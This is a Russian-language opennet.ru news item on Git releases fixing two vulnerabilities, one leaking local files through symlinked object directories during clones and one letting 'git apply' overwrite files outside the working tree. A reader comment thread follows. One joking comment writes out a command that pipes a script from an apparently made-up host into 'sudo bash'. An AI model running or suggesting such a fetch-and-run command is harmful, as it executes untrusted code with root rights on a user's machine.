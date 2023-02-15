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Уязвимости в Git, приводящие к утечке и перезаписи данных

15.02.2023 14:55

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7 и 2.30.8, в которых устранены две уязвимости, затрагивающие оптимизации при локальном клонировании и команду "git apply". Проследить за выпуском обновлений пакетов в дистрибутивах можно на страницах Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD. Если установить обновление не представляется возможным, в качестве обходных мер рекомендуется избегать выполнения операции "git clone" с опцией "--recurse-submodules" с репозиториями, не заслуживающими доверия, а также не использовать команды "git apply" и "git am" с непроверенным кодом.

  • Уязвимость CVE-2023-22490 позволяет атакующему, контролирующему содержимое клонируемого репозитория, получить доступ к конфиденциальным данным на системе пользователя. Появлению уязвимости способствуют две недоработки:

    Первая недоработка, позволяет при работе со специально оформленным репозиторием добиться применения локальных оптимизаций клонирования даже при использовании транспорта, взаимодействующего со внешними системами.

    Вторая недоработка, допускает размещение символической ссылки вместо каталога $GIT_DIR/objects по аналогии с уязвимостью CVE-2022-39253, в исправлении которой блокировалось размещение символических ссылок в каталоге $GIT_DIR/objects, но не проверялся факт того, что сам каталог $GIT_DIR/objects может быть символической ссылкой.

    В режиме локального клонирования git переносит $GIT_DIR/objects в целевой каталог, выполняя разыменование символических ссылок, что приводит к тому, что в целевой каталог копируются непосредственно файлы, на которые указывают ссылки. Переключение на применение локальных оптимизаций клонирования для нелокального транспорта позволяет эксплуатировать уязвимость при работе с внешними репозиториями (например, рекурсивное включение субмодулей командой "git clone --recurse-submodules" может привести к клонированию вредоносного репозитория, упакованного в форме субмодуля в другом репозитории).

  • Уязвимость CVE-2023-23946 позволяет перезаписать содержимое файлов вне рабочего каталога через передачу специально оформленного ввода в команду "git apply". Например, атака может быть совершена при обработке в "git apply" подготовленных злоумышленником патчей. Для блокирования создания патчами файлов вне рабочей копии, "git apply" блокирует обработку патчей, пытающихся записать файл с использованием символических ссылок. Но эту защиту оказалось можно обойти, создав символическую ссылку в первую очередь.


  1. Главная ссылка к новости (https://lore.kernel.org/git/xm...)
  2. OpenNews: Две уязвимости в Git, способные привести к удалённому выполнению кода
  3. OpenNews: Выпуск системы управления исходными текстами Git 2.39
  4. OpenNews: В Git устранена уязвимость, которая может привести к выполнению кода атакующего
  5. OpenNews: Обновление Git с устранением уязвимости, допускающей удалённое выполнение кода
  6. OpenNews: Уязвимости в Git, проявляющиеся при клонировании субмодулей и использовании git shell
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/58655-git
Ключевые слова: git
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (27) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.3, Аноним (3), 16:17, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не зря Тео запилил got, ой не зря.
     
     
  • 2.4, Аноним (4), 16:19, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Чем меньше возможностей, тем меньше проблем. Если не умеет вообще ничего, статистически будет более надёжно, но пользоваться этим никто не сможет.
     
     
  • 3.26, Аноним (26), 19:23, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну гиту уменьшение функционала не повредит. Много специфичного и малоиспользуемого функционала.
     
  • 2.37, О ноним (?), 20:45, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    OpenSSH не даст соврать.
     

  • 1.6, Хру (?), 16:46, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Вопрос всенарастпереписальщикам - ну и как borrow-checker защитит от логических ошибок этого класса (преждевременная оптимизация)? :)
     
     
  • 2.9, Аноним (9), 17:05, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Успокойся, тут никто не говорил про твой этот борроу-чекер.
     
  • 2.16, Аноним (16), 18:12, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Никак.
     

  • 1.13, Аноним (13), 18:00, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    Деды раньше как-то модули в тарах хранили, а внучата сейчас все модули в git репах хранят. Обленились совсем.
     
  • 1.14, Аноньимъ (ok), 18:01, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Гит такая странная монстроузная ерунда, как тот OpenSSL, что непонятно как оно вообще работает и не падает на каждый чих.
     
     
  • 2.24, Аноним (24), 19:22, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    «Git» и «OpenSSL» тут можно заменить на любой современный софт.
     
     
  • 3.27, Аноньимъ (ok), 19:26, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > «Git» и «OpenSSL» тут можно заменить на любой современный софт.

    Есть софт сломанный на уровне архитектуры. А есть просто плохо реализованный. А есть и нормально в целом.
    Git относиться к категории - это нельзя было делать ни при каких обстоятельствах.

     
     
  • 4.31, Аноним (31), 19:52, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Его делали для конкретной цели - как систему контроля для разработки ядра. Со всеми вытекающими. Зачем миллионы мух стали тащить его в свои проекты надо спросить у этих самых мух.
     
  • 2.25, Вы забыли заполнить поле Name (?), 19:23, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Дрю деволт с тобой бы поспорил https://git.sr.ht/~sircmpwn/shit
     
     
  • 3.28, Аноньимъ (ok), 19:29, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Дрю деволт с тобой бы поспорил https://git.sr.ht/~sircmpwn/shit

    А чего спорить, про гит и шелскрипт всё написано по ссылке:
    How to use - Don't

     
     
  • 4.34, Вы забыли заполнить поле Name (?), 20:07, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Предыстория другая: дрю спорил о том что гит на самом деле прост и он реализует его на баше, что собственно он и сделал. Пользоваться понятное дело этим смысла не имеет.
     

  • 1.21, Аноним (21), 19:07, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    в curl найдена уязвимость, не рекомендуется выполнять curl http://xx44.cc.us/coolscript.sh | sudo bash -s
     
  • 1.30, анонимус (??), 19:35, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А как же 2.39.1?
     
  • 1.32, Аноним (32), 19:55, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    https://security-tracker.debian.org/tracker/CVE-2023-22490

    >vulnerable

    классика. В некоммерчеких проектах никто никому ничего не обязан

     
     
  • 2.35, Аноним (35), 20:12, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Наброс не засчитан
     

  • 1.33, AKTEON (?), 20:02, 15/02/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Я не понимаю, чем вы недовольны ?? Git никогда не был системой контроля версий (git rebase и вместо Берии у вас Бернингов пролив), а теперь этот ценный функционал - расширили на всю файловую систему . Это ж просто праздник какой-то ...
     
     
  • 2.36, Аноним (36), 20:28, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    А чем он был?
     
     
  • 3.40, OpenEcho (?), 20:52, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > А чем он был?

    Хэшед-Блобо-Мэйкером

     
  • 3.41, Да ну нахер (?), 21:10, 15/02/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Неплохой клиент для обмена патчами по электронной почте.
     

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